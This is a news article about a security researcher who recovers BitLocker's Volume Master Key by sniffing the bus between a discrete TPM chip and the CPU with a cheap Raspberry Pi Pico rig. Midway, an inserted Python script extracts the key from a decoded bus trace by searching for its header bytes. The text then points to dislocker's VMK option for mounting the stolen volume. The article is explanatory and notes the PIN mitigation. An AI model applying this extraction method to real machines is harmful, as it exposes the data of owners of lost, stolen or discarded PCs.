Windows BitLocker can be broken in 43 seconds on an old PC using a simple Raspberry Pi Pico


Maxence Glineur

February 7, 2024 at 9:11 p.m.



Microsoft says its encryption system is particularly difficult to circumvent. Yet it can be done with a tool costing about 10 dollars.

TPM chips have drawn a lot of attention in recent years, and for good reason: Windows 11 refuses to install on a system that does not have one.

But beyond the shorter lifespan it promises for PCs unable to migrate from Windows 10, this component also makes it quite easy to encrypt the data on a device's drives: the TPM holds the key and releases it at boot without the user having to type anything. A real convenience which, as a YouTuber shows, is also its greatest weakness.

A Best Of menu or free access to an encrypted hard drive?

Microsoft presents BitLocker as an encryption system that takes very specific hardware and advanced knowledge to circumvent, and in general there is no reason to doubt that. BitLocker nonetheless has a major weakness tied to the design of certain computers. In the common TPM-only configuration (no PIN), it relies on a discrete TPM chip soldered to the motherboard, which releases the disk encryption key to the CPU at boot over a bus that… is not protected: the key crosses it in the clear.

The YouTuber stacksmashing, a security researcher, has just demonstrated it. On some motherboards, easily accessible connectors expose the lines carrying the traffic between the two components. With a few well-placed probes he was able to capture, as the computer booted, the key material needed to read the SSD: BitLocker's Volume Master Key (VMK), which the TPM hands over unencrypted.

The tool used for the operation is none other than a Raspberry Pi Pico, sold in France for less than 6 euros, mounted on a printed circuit board he had made for a few dollars. The board carries spring-loaded contacts (pogo pins) that press onto easily accessible and fairly prominent connectors on the motherboard. According to stacksmashing, the whole rig cost him about 10 dollars.

No soldering is needed: the key BitLocker uses is captured on the fly, in… 43 seconds, on an assembled and working computer.


Demonstrations of the stacksmashing tool, which captures in real time the data transmitted between the TPM chip and the CPU © stacksmashing on YouTube

Millions of out-of-use PCs affected

The Pi Pico's job is to read the bits (0s and 1s) exchanged between the TPM chip and the CPU. Once the key has been recovered, it is enough to connect the target computer's drive to another PC to read its data. In his demonstration, stacksmashing needed nothing more than open-source software on Linux to decrypt everything on the BitLocker-protected machine. Had the computer been configured to require a PIN in addition to the TPM, this would not normally have been possible: the TPM only releases the key once the PIN has been entered, so an attacker who simply powers the machine on has nothing to capture (the key still crosses the bus in the clear once the legitimate user has typed the PIN, however, so the probe would have to be in place at that moment).
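To make the two steps concrete, here is an added example in Python (not stacksmashing's firmware, nor Microsoft's code): it takes a TPM bus trace that has already been decoded into register reads and writes, keeps only the bytes the CPU reads back from the TPM's data FIFO, and searches that stream for the 12-byte header that precedes BitLocker's VMK in the TPM's unseal response. The trace, the register offsets used and the key are constructed for illustration and labelled as such in the code.

```python
"""Recover a BitLocker Volume Master Key (VMK) from a TPM bus capture.

Added example, not stacksmashing's firmware nor Microsoft's code. It models the
two steps the article describes: keep only the bytes the CPU reads back from the
TPM, then locate the key in that stream.

Assumptions (not from the article):
  * The capture has already been decoded from LPC bus cycles into
    (direction, register address, byte) records; TPM_DATA_FIFO (offset 0x24 in
    the TPM TIS register map) is where response bytes are read from.
  * The VMK inside the TPM's unseal response is preceded by the 12-byte header
    2c 00 00 00 01 00 00 00 03 20 00 00, the marker TPM-sniffing tools search
    for, and is 32 bytes long.
  * All trace data below is constructed for illustration; the key is fake.
"""
from dataclasses import dataclass
from typing import Iterable, Optional

TPM_DATA_FIFO = 0x0024  # TIS register the CPU reads response bytes from
TPM_STS = 0x0018        # TIS status register, polled between FIFO reads

VMK_HEADER = bytes.fromhex("2c0000000100000003200000")
VMK_LEN = 32


@dataclass(frozen=True)
class LpcCycle:
    read: bool  # True: CPU reads from the TPM; False: CPU writes to it
    addr: int   # 16-bit TPM register address seen on the LPC bus
    value: int  # the byte transferred


def fifo_bytes(cycles: Iterable[LpcCycle]) -> bytes:
    """Reassemble the TPM response stream: only reads from the data FIFO count.
    Status polls and command writes are interleaved on the bus and are dropped."""
    return bytes(c.value for c in cycles if c.read and c.addr == TPM_DATA_FIFO)


def find_vmk(stream: bytes) -> Optional[bytes]:
    """Return the 32-byte VMK following the known header, or None if it is
    absent or the capture stops before the key is complete."""
    idx = stream.find(VMK_HEADER)
    if idx < 0:
        return None
    start = idx + len(VMK_HEADER)
    key = stream[start:start + VMK_LEN]
    return key if len(key) == VMK_LEN else None


FAKE_VMK = bytes(range(0x10, 0x10 + VMK_LEN))  # constructed, not a real key


def constructed_trace(vmk: bytes = FAKE_VMK) -> list:
    """Build a plausible bus trace (constructed): the start of a command write,
    then a TPM2_Unseal-shaped response (tag 0x8001, size, rc 0, TPM2B outData)
    whose outData is BitLocker's 44-byte key blob, with a status poll before
    every FIFO read, as a real CPU driver would do."""
    blob = VMK_HEADER + vmk                      # 44 bytes = 0x2c, matching the header
    outdata = len(blob).to_bytes(2, "big") + blob
    response = (bytes.fromhex("8001")
                + (10 + len(outdata)).to_bytes(4, "big")
                + bytes(4)                       # responseCode TPM_RC_SUCCESS
                + outdata)
    trace = [LpcCycle(False, TPM_DATA_FIFO, 0x80),   # CPU writing the command: ignored
             LpcCycle(False, TPM_DATA_FIFO, 0x01)]
    for b in response:
        trace.append(LpcCycle(True, TPM_STS, 0x90))  # stsValid | dataAvail
        trace.append(LpcCycle(True, TPM_DATA_FIFO, b))
    return trace


def main() -> None:
    stream = fifo_bytes(constructed_trace())
    vmk = find_vmk(stream)
    if vmk is None:
        print("no VMK header in capture (nothing released, or capture incomplete)")
        return
    print("VMK:", vmk.hex())
    # Raw key bytes for the next step on another machine; check the consuming
    # tool's documentation for the exact file format it expects (assumption).
    with open("vmk.bin", "wb") as f:
        f.write(vmk)


if __name__ == "__main__":
    main()
```

With a real capture, the extracted key is what an open-source BitLocker implementation such as dislocker consumes through its -k/--vmk option to mount the volume from another PC, which is the second half of the attack described above. Note also what the code cannot do: produce a key when the TPM never released one, which is exactly the situation when a PIN protector is configured and the attacker is not the one typing the PIN.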

So, is the protection promised by TPM chips and today's most widely used versions of Windows still viable? Yes and no. Our YouTuber used an aging computer here, on which this critical component was a separate chip, physically apart from the CPU. Many newer devices no longer have the flaw in this form, because the TPM is implemented in firmware inside the processor itself (a firmware TPM), leaving no external bus to tap; reaching the key from outside would then be considerably more complicated and, above all, slower. Discrete TPM chips have not disappeared from new business machines, however, so the configuration matters at least as much as the age of the PC.

There are two lessons here. Inside the CPU or not, the TPM releases the key unencrypted in BitLocker's TPM-only mode, and the only thing standing between that key and an attacker is how hard the path to the CPU is to reach, which leaves the door open to circumvention, tomorrow or further down the road. Above all, BitLocker does not fully do its job on the millions of aging or discarded PCs that pair a discrete TPM with no PIN, leaving their folders and files open to anyone with physical access. A reminder that retiring a hard drive or SSD, and erasing its data, should not be taken lightly.

Source : Tom’s Hardware
